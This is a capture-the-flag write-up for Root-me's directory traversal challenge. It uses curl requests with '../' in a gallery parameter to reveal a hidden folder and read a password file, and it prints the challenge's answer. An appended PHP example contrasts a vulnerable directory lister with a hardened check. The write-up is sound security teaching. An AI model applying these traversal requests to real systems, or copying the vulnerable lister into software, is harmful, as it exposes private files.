Root-me

Directory Traversal

In this challenge we need to find the hidden section of the photo gallery. We already know that we’re using directory traversal.

If we look at the challenge page and click on one of its sections, we can see how the URL is formed.

http://challenge01.root-me.org/web-serveur/ch15/ch15.php?galerie=actions

If we try to move one directory up:

 curl 'http://challenge01.root-me.org/web-serveur/ch15/ch15.php?galerie=../'
 
	  <h1>Photo gallery v 0.01</h1><span id="mnenu"/>&nbsp;|&nbsp;<span>
      <a href="?galerie=emotes">emotes</a></span>&nbsp;|&nbsp;<span><a href="?galerie=apps">apps</a>
      </span>&nbsp;|&nbsp;<span><a href="?galerie=devices">devices</a></span>&nbsp;|&nbsp;
      <span><a href="?galerie=categories">categories</a></span>&nbsp;|&nbsp;
      <span><a href="?galerie=actions">actions</a></span>&nbsp;|</span>
      <span style='text-align: right; float:right;'>Connected as : <b>guest</b></span>
      <br/><hr/><table id="content"><tr><td>
      <img width="64px" height="64px" src="galerie/..//galerie" alt="galerie"></td></tr>
      <tr><td><img width="64px" height="64px" src="galerie/..//ch15.php" alt="ch15.php"></td></tr>
      <tr></tr></table></body></html>

I tried cleaning the code a little bit, but the important part is that we see two results: one is /galerie and the other is /galerie/ch15.php

If we browse /galerie, we’ll notice that there’s a hidden section.

curl 'http://challenge01.root-me.org/web-serveur/ch15/ch15.php?galerie=../galerie'

	  <h1>Photo gallery v 0.01</h1><span id="mnenu"/>&nbsp;|&nbsp;<span>
      <a href="?galerie=emotes">emotes</a></span>&nbsp;|&nbsp;<span>
      <a href="?galerie=apps">apps</a></span>&nbsp;|&nbsp;<span>
      <a href="?galerie=devices">devices</a></span>&nbsp;|&nbsp;<span>
      <a href="?galerie=categories">categories</a></span>&nbsp;|&nbsp;<span>
      <a href="?galerie=actions">actions</a></span>&nbsp;|</span>
      <span style='text-align: right; float:right;'>Connected as : <b>guest</b></span><br/><hr/>
      <table id="content"><tr><td><img width="64px" height="64px" src="galerie/../galerie/86hwnX2r" alt="86hwnX2r"></td></tr>
      <tr><td><img width="64px" height="64px" src="galerie/../galerie/emotes" alt="emotes"></td>
      <td><img width="64px" height="64px" src="galerie/../galerie/apps" alt="apps"></td>
      <td><img width="64px" height="64px" src="galerie/../galerie/devices" alt="devices"></td></tr>
      <tr><td><img width="64px" height="64px" src="galerie/../galerie/categories" alt="categories"></td>
      <td><img width="64px" height="64px" src="galerie/../galerie/actions" alt="actions"></td></tr>
      </table></body></html>

The hidden section is 86hwnX2r. If we browse it, we’ll see a file called password.txt. Let’s see its content:

curl http://challenge01.root-me.org/web-serveur/ch15/galerie/86hwnX2r/password.txt

kcb$!Bx@v4Gs9Ez 

We got what we were looking for.
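
The responses above are consistent with a handler that appends the galerie parameter to a base directory without checking where the result points. The following is an added example, not the challenge's source or the author's code: a hypothetical vulnerable lister beside a hardened one that resolves the path with realpath() and accepts only directories strictly below the gallery base. The function names, the temporary directory layout and the hidden-section name are constructed for illustration.

```php
<?php
// Added example: hypothetical handler logic, not the challenge's source code.

// Constructed sandbox laid out like the responses above: a script next to galerie/.
$root = sys_get_temp_dir() . '/ch15_demo_' . bin2hex(random_bytes(4));
foreach (['actions', 'apps', 'hidden-section'] as $dir) {
    mkdir("$root/galerie/$dir", 0700, true);
}
touch("$root/ch15.php");
touch("$root/galerie/actions/icon.png");

// Vulnerable pattern (assumed): the parameter is appended to the base unchecked,
// so "../" lists the parent and "../galerie" lists the base with every section.
function list_vulnerable(string $root, string $galerie): array
{
    $entries = scandir("$root/galerie/$galerie") ?: [];
    return array_values(array_diff($entries, ['.', '..']));
}

// Hardened: canonicalise first, then accept only directories strictly below the base.
function list_hardened(string $root, string $galerie): ?array
{
    $base = realpath("$root/galerie");
    $target = realpath("$base/$galerie"); // resolves "..", "." and symlinks
    if ($base === false || $target === false || !is_dir($target)) {
        return null; // nothing to list
    }
    // Comparing against "$base/" rejects the base itself and siblings that merely
    // share its prefix (for example a directory named "galerie_old").
    $prefix = $base . DIRECTORY_SEPARATOR;
    if (strncmp($target, $prefix, strlen($prefix)) !== 0) {
        return null; // resolved path escaped the gallery base
    }
    return array_values(array_diff(scandir($target) ?: [], ['.', '..']));
}

foreach (['actions', '../', '../galerie', 'actions/../..'] as $input) {
    printf("%-14s vulnerable=%s hardened=%s\n", $input,
        json_encode(list_vulnerable($root, $input)),
        json_encode(list_hardened($root, $input)));
}
```

A request that names the hidden section directly still passes this check, and password.txt was fetched straight from the web server rather than through the script, so the containment test does not replace keeping secrets outside the document root or serving only sections from an allowlist.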